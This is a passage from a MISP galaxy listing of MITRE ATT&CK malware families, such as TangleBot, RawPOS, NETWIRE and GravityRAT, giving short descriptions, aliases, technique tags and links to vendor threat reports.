  • uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 7563. Table References

Links

http://blog.morphisec.com/security-alert-fin8-is-back

https://attack.mitre.org/software/S0196

https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html

https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html

TangleBot - S1069

[TangleBot](https://attack.mitre.org/software/S1069) is SMS malware that was initially observed in September 2021, primarily targeting mobile users in the United States and Canada. [TangleBot](https://attack.mitre.org/software/S1069) has used SMS text message lures about COVID-19 regulations and vaccines to trick mobile users into downloading the malware, similar to [FluBot](https://attack.mitre.org/software/S1067) Android malware campaigns.(Citation: cloudmark_tanglebot_0921)

The tag is: misp-galaxy:mitre-malware="TangleBot - S1069"

TangleBot - S1069 is also known as:

  • TangleBot

Table 7564. Table References

Links

https://attack.mitre.org/software/S1069

https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19

Neoichor - S0691

[Neoichor](https://attack.mitre.org/software/S0691) is C2 malware used by [Ke3chang](https://attack.mitre.org/groups/G0004) since at least 2019; similar malware families used by the group include Leeson and Numbldea.(Citation: Microsoft NICKEL December 2021)

The tag is: misp-galaxy:mitre-malware="Neoichor - S0691"

Neoichor - S0691 is also known as:

  • Neoichor

Table 7565. Table References

Links

https://attack.mitre.org/software/S0691

https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe

RawPOS - S0169

[RawPOS](https://attack.mitre.org/software/S0169) is a point-of-sale (POS) malware family that searches for cardholder data on victims. It has been in use since at least 2008. (Citation: Kroll RawPOS Jan 2017) (Citation: TrendMicro RawPOS April 2015) (Citation: Visa RawPOS March 2015) FireEye divides RawPOS into three components: FIENDCRY, DUEBREW, and DRIFTWOOD. (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)

The tag is: misp-galaxy:mitre-malware="RawPOS - S0169"

RawPOS - S0169 is also known as:

  • RawPOS

  • FIENDCRY

  • DUEBREW

  • DRIFTWOOD

RawPOS - S0169 has relationships with:

  • similar: misp-galaxy:malpedia="RawPOS" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Data Staged - T1074" with estimative-language:likelihood-probability="almost-certain"

Table 7566. Table References

Links

http://sjc1-te-ftp.trendmicro.com/images/tex/pdf/RawPOS%20Technical%20Brief.pdf

https://attack.mitre.org/software/S0169

https://github.com/DiabloHorn/mempdump

https://usa.visa.com/dam/VCOM/download/merchants/alert-rawpos.pdf

https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?

https://www.kroll.com/en/insights/publications/malware-analysis-report-rawpos-malware

https://www.youtube.com/watch?v=fevGZs0EQu8

Hornbill - S1077

[Hornbill](https://attack.mitre.org/software/S1077) is one of two mobile malware families known to be used by the APT [Confucius](https://attack.mitre.org/groups/G0142). Analysis suggests that [Hornbill](https://attack.mitre.org/software/S1077) was first active in early 2018. While [Hornbill](https://attack.mitre.org/software/S1077) and [Sunbird](https://attack.mitre.org/software/S1082) overlap in core capabilities, [Hornbill](https://attack.mitre.org/software/S1077) has tools and behaviors suggesting more passive reconnaissance.(Citation: lookout_hornbill_sunbird_0221)

The tag is: misp-galaxy:mitre-malware="Hornbill - S1077"

Hornbill - S1077 is also known as:

  • Hornbill

Table 7567. Table References

Links

https://attack.mitre.org/software/S1077

https://www.lookout.com/blog/lookout-discovers-novel-confucius-apt-android-spyware-linked-to-india-pakistan-conflict

Daserf - S0187

[Daserf](https://attack.mitre.org/software/S0187) is a backdoor that has been used to spy on and steal from Japanese, South Korean, Russian, Singaporean, and Chinese victims. Researchers have identified versions written in both Visual C and Delphi. (Citation: Trend Micro Daserf Nov 2017) (Citation: Secureworks BRONZE BUTLER Oct 2017)

The tag is: misp-galaxy:mitre-malware="Daserf - S0187"

Daserf - S0187 is also known as:

  • Daserf

  • Muirim

  • Nioupale

Daserf - S0187 has relationships with:

  • similar: misp-galaxy:malpedia="Daserf" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1032" with estimative-language:likelihood-probability="almost-certain"

Table 7568. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/

https://attack.mitre.org/software/S0187

https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses

RotaJakiro - S1078

[RotaJakiro](https://attack.mitre.org/software/S1078) is a 64-bit Linux backdoor used by [APT32](https://attack.mitre.org/groups/G0050). First seen in 2018, it uses a plugin architecture to extend capabilities. [RotaJakiro](https://attack.mitre.org/software/S1078) can determine it’s permission level and execute according to access type (root or user).(Citation: RotaJakiro 2021 netlab360 analysis)(Citation: netlab360 rotajakiro vs oceanlotus)

The tag is: misp-galaxy:mitre-malware="RotaJakiro - S1078"

RotaJakiro - S1078 is also known as:

  • RotaJakiro

Table 7569. Table References

Links

https://attack.mitre.org/software/S1078

https://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/

https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/

Truvasys - S0178

[Truvasys](https://attack.mitre.org/software/S0178) is first-stage malware that has been used by [PROMETHIUM](https://attack.mitre.org/groups/G0056). It is a collection of modules written in the Delphi programming language. (Citation: Microsoft Win Defender Truvasys Sep 2017) (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21)

The tag is: misp-galaxy:mitre-malware="Truvasys - S0178"

Truvasys - S0178 is also known as:

  • Truvasys

Truvasys - S0178 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1060" with estimative-language:likelihood-probability="almost-certain"

Table 7570. Table References

Links

http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf

https://attack.mitre.org/software/S0178

https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/Truvasys.A!dha

PUNCHTRACK - S0197

[PUNCHTRACK](https://attack.mitre.org/software/S0197) is non-persistent point of sale (POS) system malware utilized by [FIN8](https://attack.mitre.org/groups/G0061) to scrape payment card data. (Citation: FireEye Fin8 May 2016) (Citation: FireEye Know Your Enemy FIN8 Aug 2016)

The tag is: misp-galaxy:mitre-malware="PUNCHTRACK - S0197"

PUNCHTRACK - S0197 is also known as:

  • PUNCHTRACK

  • PSVC

PUNCHTRACK - S0197 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Data Staged - T1074" with estimative-language:likelihood-probability="almost-certain"

Table 7571. Table References

Links

https://attack.mitre.org/software/S0197

https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html

https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html

BOULDSPY - S1079

[BOULDSPY](https://attack.mitre.org/software/S1079) is an Android malware, detected in early 2023, with surveillance and remote-control capabilities. Analysis of exfiltrated C2 data suggests that [BOULDSPY](https://attack.mitre.org/software/S1079) primarily targeted minority groups in Iran.(Citation: lookout_bouldspy_0423)

The tag is: misp-galaxy:mitre-malware="BOULDSPY - S1079"

BOULDSPY - S1079 is also known as:

  • BOULDSPY

Table 7572. Table References

Links

https://attack.mitre.org/software/S1079

https://www.lookout.com/blog/iranian-spyware-bouldspy

Disco - S1088

[Disco](https://attack.mitre.org/software/S1088) is a custom implant that has been used by [MoustachedBouncer](https://attack.mitre.org/groups/G1019) since at least 2020 including in campaigns using targeted malicious content injection for initial access and command and control.(Citation: MoustachedBouncer ESET August 2023)

The tag is: misp-galaxy:mitre-malware="Disco - S1088"

Disco - S1088 is also known as:

  • Disco

Table 7573. Table References

Links

https://attack.mitre.org/software/S1088

https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/

Starloader - S0188

[Starloader](https://attack.mitre.org/software/S0188) is a loader component that has been observed loading [Felismus](https://attack.mitre.org/software/S0171) and associated tools. (Citation: Symantec Sowbug Nov 2017)

The tag is: misp-galaxy:mitre-malware="Starloader - S0188"

Starloader - S0188 is also known as:

  • Starloader

Starloader - S0188 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 7574. Table References

Links

https://attack.mitre.org/software/S0188

https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments

SharpDisco - S1089

[SharpDisco](https://attack.mitre.org/software/S1089) is a dropper developed in C# that has been used by [MoustachedBouncer](https://attack.mitre.org/groups/G1019) since at least 2020 to load malicious plugins.(Citation: MoustachedBouncer ESET August 2023)

The tag is: misp-galaxy:mitre-malware="SharpDisco - S1089"

SharpDisco - S1089 is also known as:

  • SharpDisco

Table 7575. Table References

Links

https://attack.mitre.org/software/S1089

https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/

NETWIRE - S0198

[NETWIRE](https://attack.mitre.org/software/S0198) is a publicly available, multiplatform remote administration tool (RAT) that has been used by criminal and APT groups since at least 2012.(Citation: FireEye APT33 Sept 2017)(Citation: McAfee Netwire Mar 2015)(Citation: FireEye APT33 Webinar Sept 2017)

The tag is: misp-galaxy:mitre-malware="NETWIRE - S0198"

NETWIRE - S0198 is also known as:

  • NETWIRE

NETWIRE - S0198 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1056" with estimative-language:likelihood-probability="almost-certain"

Table 7576. Table References

Links

https://attack.mitre.org/software/S0198

https://securingtomorrow.mcafee.com/mcafee-labs/netwire-rat-behind-recent-targeted-attacks/

https://www.brighttalk.com/webcast/10703/275683

https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html

ISMInjector - S0189

[ISMInjector](https://attack.mitre.org/software/S0189) is a Trojan used to install another [OilRig](https://attack.mitre.org/groups/G0049) backdoor, ISMAgent. (Citation: OilRig New Delivery Oct 2017)

The tag is: misp-galaxy:mitre-malware="ISMInjector - S0189"

ISMInjector - S0189 is also known as:

  • ISMInjector

ISMInjector - S0189 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

Table 7577. Table References

Links

https://attack.mitre.org/software/S0189

https://researchcenter.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/

TURNEDUP - S0199

[TURNEDUP](https://attack.mitre.org/software/S0199) is a non-public backdoor. It has been dropped by [APT33](https://attack.mitre.org/groups/G0064)'s [StoneDrill](https://attack.mitre.org/software/S0380) malware. (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)

The tag is: misp-galaxy:mitre-malware="TURNEDUP - S0199"

TURNEDUP - S0199 is also known as:

  • TURNEDUP

TURNEDUP - S0199 has relationships with:

  • similar: misp-galaxy:malpedia="TURNEDUP" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 7578. Table References

Links

https://attack.mitre.org/software/S0199

https://www.brighttalk.com/webcast/10703/275683

https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html

CCBkdr - S0222

[CCBkdr](https://attack.mitre.org/software/S0222) is malware that was injected into a signed version of CCleaner and distributed from CCleaner’s distribution website. (Citation: Talos CCleanup 2017) (Citation: Intezer Aurora Sept 2017)

The tag is: misp-galaxy:mitre-malware="CCBkdr - S0222"

CCBkdr - S0222 is also known as:

  • CCBkdr

CCBkdr - S0222 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1195" with estimative-language:likelihood-probability="almost-certain"

Table 7579. Table References

Links

http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html

http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/

https://attack.mitre.org/software/S0222

POWERSTATS - S0223

[POWERSTATS](https://attack.mitre.org/software/S0223) is a PowerShell-based first stage backdoor used by [MuddyWater](https://attack.mitre.org/groups/G0069). (Citation: Unit 42 MuddyWater Nov 2017)

The tag is: misp-galaxy:mitre-malware="POWERSTATS - S0223"

POWERSTATS - S0223 is also known as:

  • POWERSTATS

  • Powermud

POWERSTATS - S0223 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 7580. Table References

Links

https://attack.mitre.org/software/S0223

https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/

https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf

https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group

HummingBad - S0322

[HummingBad](https://attack.mitre.org/software/S0322) is a family of Android malware that generates fraudulent advertising revenue and has the ability to obtain root access on older, vulnerable versions of Android. (Citation: ArsTechnica-HummingBad)

The tag is: misp-galaxy:mitre-malware="HummingBad - S0322"

HummingBad - S0322 is also known as:

  • HummingBad

HummingBad - S0322 has relationships with:

  • similar: misp-galaxy:android="HummingBad" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Generate Fraudulent Advertising Revenue - T1472" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Manipulate App Store Rankings or Ratings - T1452" with estimative-language:likelihood-probability="almost-certain"

Table 7581. Table References

Links

http://arstechnica.com/security/2016/07/virulent-auto-rooting-malware-takes-control-of-10-million-android-devices/

https://attack.mitre.org/software/S0322

HOMEFRY - S0232

[HOMEFRY](https://attack.mitre.org/software/S0232) is a 64-bit Windows password dumper/cracker that has previously been used in conjunction with other [Leviathan](https://attack.mitre.org/groups/G0065) backdoors. (Citation: FireEye Periscope March 2018)

The tag is: misp-galaxy:mitre-malware="HOMEFRY - S0232"

HOMEFRY - S0232 is also known as:

  • HOMEFRY

HOMEFRY - S0232 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 7582. Table References

Links

https://attack.mitre.org/software/S0232

https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

SynAck - S0242

[SynAck](https://attack.mitre.org/software/S0242) is variant of Trojan ransomware targeting mainly English-speaking users since at least fall 2017. (Citation: SecureList SynAck Doppelgänging May 2018) (Citation: Kaspersky Lab SynAck May 2018)

The tag is: misp-galaxy:mitre-malware="SynAck - S0242"

SynAck - S0242 is also known as:

  • SynAck

Table 7583. Table References

Links

https://attack.mitre.org/software/S0242

https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/

https://usa.kaspersky.com/about/press-releases/2018_synack-doppelganging

Anubis - S0422

[Anubis](https://attack.mitre.org/software/S0422) is Android malware that was originally used for cyber espionage, and has been retooled as a banking trojan.(Citation: Cofense Anubis)

The tag is: misp-galaxy:mitre-malware="Anubis - S0422"

Anubis - S0422 is also known as:

  • Anubis

Table 7584. Table References

Links

https://attack.mitre.org/software/S0422

https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/

Exobot - S0522

[Exobot](https://attack.mitre.org/software/S0522) is Android banking malware, primarily targeting financial institutions in Germany, Austria, and France.(Citation: Threat Fabric Exobot)

The tag is: misp-galaxy:mitre-malware="Exobot - S0522"

Exobot - S0522 is also known as:

  • Exobot

  • Marcher

Table 7585. Table References

Links

https://attack.mitre.org/software/S0522

https://www.proofpoint.com/us/threat-insight/post/credential-phishing-and-android-banking-trojan-combine-austrian-mobile-attacks

https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html

AppleSeed - S0622

[AppleSeed](https://attack.mitre.org/software/S0622) is a backdoor that has been used by [Kimsuky](https://attack.mitre.org/groups/G0094) to target South Korean government, academic, and commercial targets since at least 2021.(Citation: Malwarebytes Kimsuky June 2021)

The tag is: misp-galaxy:mitre-malware="AppleSeed - S0622"

AppleSeed - S0622 is also known as:

  • AppleSeed

Table 7586. Table References

Links

https://attack.mitre.org/software/S0622

https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/

NDiskMonitor - S0272

[NDiskMonitor](https://attack.mitre.org/software/S0272) is a custom backdoor written in .NET that appears to be unique to [Patchwork](https://attack.mitre.org/groups/G0040). (Citation: TrendMicro Patchwork Dec 2017)

The tag is: misp-galaxy:mitre-malware="NDiskMonitor - S0272"

NDiskMonitor - S0272 is also known as:

  • NDiskMonitor

Table 7587. Table References

Links

https://attack.mitre.org/software/S0272

https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf

NanHaiShu - S0228

[NanHaiShu](https://attack.mitre.org/software/S0228) is a remote access tool and JScript backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065). [NanHaiShu](https://attack.mitre.org/software/S0228) has been used to target government and private-sector organizations that have relations to the South China Sea dispute. (Citation: Proofpoint Leviathan Oct 2017) (Citation: fsecure NanHaiShu July 2016)

The tag is: misp-galaxy:mitre-malware="NanHaiShu - S0228"

NanHaiShu - S0228 is also known as:

  • NanHaiShu

NanHaiShu - S0228 has relationships with:

  • similar: misp-galaxy:tool="NanHaiShu" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 7588. Table References

Links

https://attack.mitre.org/software/S0228

https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf

https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets

MacSpy - S0282

[MacSpy](https://attack.mitre.org/software/S0282) is a malware-as-a-service offered on the darkweb (Citation: objsee mac malware 2017).

The tag is: misp-galaxy:mitre-malware="MacSpy - S0282"

MacSpy - S0282 is also known as:

  • MacSpy

Table 7589. Table References

Links

https://attack.mitre.org/software/S0282

https://objective-see.com/blog/blog_0x25.html

AndroRAT - S0292

[AndroRAT](https://attack.mitre.org/software/S0292) is malware that allows a third party to control the device and collect information. (Citation: Lookout-EnterpriseApps)

The tag is: misp-galaxy:mitre-malware="AndroRAT - S0292"

AndroRAT - S0292 has relationships with:

  • similar: misp-galaxy:malpedia="AndroRAT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"

Table 7590. Table References

Links

https://attack.mitre.org/software/S0292

https://blog.lookout.com/blog/2016/05/25/spoofed-apps/

Orz - S0229

[Orz](https://attack.mitre.org/software/S0229) is a custom JavaScript backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065). It was observed being used in 2014 as well as in August 2017 when it was dropped by Microsoft Publisher files. (Citation: Proofpoint Leviathan Oct 2017) (Citation: FireEye Periscope March 2018)

The tag is: misp-galaxy:mitre-malware="Orz - S0229"

Orz - S0229 is also known as:

  • Orz

  • AIRBREAK

Orz - S0229 has relationships with:

  • similar: misp-galaxy:malpedia="AIRBREAK" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 7591. Table References

Links

https://attack.mitre.org/software/S0229

https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets

Charger - S0323

[Charger](https://attack.mitre.org/software/S0323) is Android malware that steals steals contacts and SMS messages from the user’s device. It can also lock the device and demand ransom payment if it receives admin permissions. (Citation: CheckPoint-Charger)

The tag is: misp-galaxy:mitre-malware="Charger - S0323"

Charger - S0323 is also known as:

  • Charger

Charger - S0323 has relationships with:

  • similar: misp-galaxy:malpedia="Charger" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"

Table 7592. Table References

Links

http://blog.checkpoint.com/2017/01/24/charger-malware/

https://attack.mitre.org/software/S0323

MURKYTOP - S0233

[MURKYTOP](https://attack.mitre.org/software/S0233) is a reconnaissance tool used by [Leviathan](https://attack.mitre.org/groups/G0065). (Citation: FireEye Periscope March 2018)

The tag is: misp-galaxy:mitre-malware="MURKYTOP - S0233"

MURKYTOP - S0233 is also known as:

  • MURKYTOP

MURKYTOP - S0233 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

Table 7593. Table References

Links

https://attack.mitre.org/software/S0233

https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

Bread - S0432

[Bread](https://attack.mitre.org/software/S0432) was a large-scale billing fraud malware family known for employing many different cloaking and obfuscation techniques in an attempt to continuously evade Google Play Store’s malware detection. 1,700 unique Bread apps were detected and removed from the Google Play Store before being downloaded by users.(Citation: Google Bread)

The tag is: misp-galaxy:mitre-malware="Bread - S0432"

Bread - S0432 is also known as:

  • Bread

  • Joker

Table 7594. Table References

Links

https://attack.mitre.org/software/S0432

https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html

Bandook - S0234

[Bandook](https://attack.mitre.org/software/S0234) is a commercially available RAT, written in Delphi and C++, that has been available since at least 2007. It has been used against government, financial, energy, healthcare, education, IT, and legal organizations in the US, South America, Europe, and Southeast Asia. [Bandook](https://attack.mitre.org/software/S0234) has been used by [Dark Caracal](https://attack.mitre.org/groups/G0070), as well as in a separate campaign referred to as "Operation Manul".(Citation: EFF Manul Aug 2016)(Citation: Lookout Dark Caracal Jan 2018)(Citation: CheckPoint Bandook Nov 2020)

The tag is: misp-galaxy:mitre-malware="Bandook - S0234"

Bandook - S0234 is also known as:

  • Bandook

Table 7595. Table References

Links

https://attack.mitre.org/software/S0234

https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf

https://research.checkpoint.com/2020/bandook-signed-delivered/

https://www.eff.org/files/2016/08/03/i-got-a-letter-from-the-government.pdf

DealersChoice - S0243

[DealersChoice](https://attack.mitre.org/software/S0243) is a Flash exploitation framework used by [APT28](https://attack.mitre.org/groups/G0007). (Citation: Sofacy DealersChoice)

The tag is: misp-galaxy:mitre-malware="DealersChoice - S0243"

DealersChoice - S0243 is also known as:

  • DealersChoice

Table 7596. Table References

Links

https://attack.mitre.org/software/S0243

https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/

SpyDealer - S0324

[SpyDealer](https://attack.mitre.org/software/S0324) is Android malware that exfiltrates sensitive data from Android devices. (Citation: PaloAlto-SpyDealer)

The tag is: misp-galaxy:mitre-malware="SpyDealer - S0324"

SpyDealer - S0324 is also known as:

  • SpyDealer

Table 7597. Table References

Links

https://attack.mitre.org/software/S0324

https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/

GreyEnergy - S0342

[GreyEnergy](https://attack.mitre.org/software/S0342) is a backdoor written in C and compiled in Visual Studio. [GreyEnergy](https://attack.mitre.org/software/S0342) shares similarities with the [BlackEnergy](https://attack.mitre.org/software/S0089) malware and is thought to be the successor of it.(Citation: ESET GreyEnergy Oct 2018)

The tag is: misp-galaxy:mitre-malware="GreyEnergy - S0342"

GreyEnergy - S0342 is also known as:

  • GreyEnergy

Table 7598. Table References

Links

https://attack.mitre.org/software/S0342

https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf

Ginp - S0423

[Ginp](https://attack.mitre.org/software/S0423) is an Android banking trojan that has been used to target Spanish banks. Some of the code was taken directly from [Anubis](https://attack.mitre.org/software/S0422).(Citation: ThreatFabric Ginp)

The tag is: misp-galaxy:mitre-malware="Ginp - S0423"

Ginp - S0423 is also known as:

  • Ginp

Table 7599. Table References

Links

https://attack.mitre.org/software/S0423

https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html

CrossRAT - S0235

[CrossRAT](https://attack.mitre.org/software/S0235) is a cross platform RAT.

The tag is: misp-galaxy:mitre-malware="CrossRAT - S0235"

CrossRAT - S0235 is also known as:

  • CrossRAT

Table 7600. Table References

Links

https://attack.mitre.org/software/S0235

https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf

RunningRAT - S0253

[RunningRAT](https://attack.mitre.org/software/S0253) is a remote access tool that appeared in operations surrounding the 2018 Pyeongchang Winter Olympics along with [Gold Dragon](https://attack.mitre.org/software/S0249) and [Brave Prince](https://attack.mitre.org/software/S0252). (Citation: McAfee Gold Dragon)

The tag is: misp-galaxy:mitre-malware="RunningRAT - S0253"

RunningRAT - S0253 is also known as:

  • RunningRAT

Table 7601. Table References

Links

https://attack.mitre.org/software/S0253

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/

Judy - S0325

[Judy](https://attack.mitre.org/software/S0325) is auto-clicking adware that was distributed through multiple apps in the Google Play Store. (Citation: CheckPoint-Judy)

The tag is: misp-galaxy:mitre-malware="Judy - S0325"

Table 7602. Table References

Links

https://attack.mitre.org/software/S0325

https://blog.checkpoint.com/2017/05/25/judy-malware-possibly-largest-malware-campaign-found-google-play/

Lucifer - S0532

[Lucifer](https://attack.mitre.org/software/S0532) is a crypto miner and DDoS hybrid malware that leverages well-known exploits to spread laterally on Windows platforms.(Citation: Unit 42 Lucifer June 2020)

The tag is: misp-galaxy:mitre-malware="Lucifer - S0532"

Lucifer - S0532 is also known as:

  • Lucifer

Table 7603. Table References

Links

https://attack.mitre.org/software/S0532

https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/

TYPEFRAME - S0263

[TYPEFRAME](https://attack.mitre.org/software/S0263) is a remote access tool that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032). (Citation: US-CERT TYPEFRAME June 2018)

The tag is: misp-galaxy:mitre-malware="TYPEFRAME - S0263"

TYPEFRAME - S0263 is also known as:

  • TYPEFRAME

Table 7604. Table References

Links

https://attack.mitre.org/software/S0263

https://www.us-cert.gov/ncas/analysis-reports/AR18-165A

GrimAgent - S0632

[GrimAgent](https://attack.mitre.org/software/S0632) is a backdoor that has been used before the deployment of [Ryuk](https://attack.mitre.org/software/S0446) ransomware since at least 2020; it is likely used by [FIN6](https://attack.mitre.org/groups/G0037) and [Wizard Spider](https://attack.mitre.org/groups/G0102).(Citation: Group IB GrimAgent July 2021)

The tag is: misp-galaxy:mitre-malware="GrimAgent - S0632"

GrimAgent - S0632 is also known as:

  • GrimAgent

Table 7605. Table References

Links

https://attack.mitre.org/software/S0632

https://gibnc.group-ib.com/s/Group-IB_GrimAgent_analysis#pdfviewer

RedDrop - S0326

[RedDrop](https://attack.mitre.org/software/S0326) is an Android malware family that exfiltrates sensitive data from devices. (Citation: Wandera-RedDrop)

The tag is: misp-galaxy:mitre-malware="RedDrop - S0326"

RedDrop - S0326 is also known as:

  • RedDrop

Table 7606. Table References

Links

https://attack.mitre.org/software/S0326

https://www.wandera.com/reddrop-malware/

Kwampirs - S0236

[Kwampirs](https://attack.mitre.org/software/S0236) is a backdoor Trojan used by [Orangeworm](https://attack.mitre.org/groups/G0071). It has been found on machines which had software installed for the use and control of high-tech imaging devices such as X-Ray and MRI machines. (Citation: Symantec Orangeworm April 2018)

The tag is: misp-galaxy:mitre-malware="Kwampirs - S0236"

Kwampirs - S0236 is also known as:

  • Kwampirs

Table 7607. Table References

Links

https://attack.mitre.org/software/S0236

https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia

Siloscape - S0623

[Siloscape](https://attack.mitre.org/software/S0623) is malware that targets Kubernetes clusters through Windows containers. [Siloscape](https://attack.mitre.org/software/S0623) was first observed in March 2021.(Citation: Unit 42 Siloscape Jun 2021)

The tag is: misp-galaxy:mitre-malware="Siloscape - S0623"

Siloscape - S0623 is also known as:

  • Siloscape

Table 7608. Table References

Links

https://attack.mitre.org/software/S0623

https://unit42.paloaltonetworks.com/siloscape/

GravityRAT - S0237

[GravityRAT](https://attack.mitre.org/software/S0237) is a remote access tool (RAT) and has been in ongoing development since 2016. The actor behind the tool remains unknown, but two usernames have been recovered that link to the author, which are "TheMartian" and "The Invincible." According to the National Computer Emergency Response Team (CERT) of India, the malware has been identified in attacks against organization and entities in India. (Citation: Talos GravityRAT)

The tag is: misp-galaxy:mitre-malware="GravityRAT - S0237"

GravityRAT - S0237 is also known as:

  • GravityRAT

Table 7609. Table References

Links

https://attack.mitre.org/software/S0237

https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html

LockerGoga - S0372

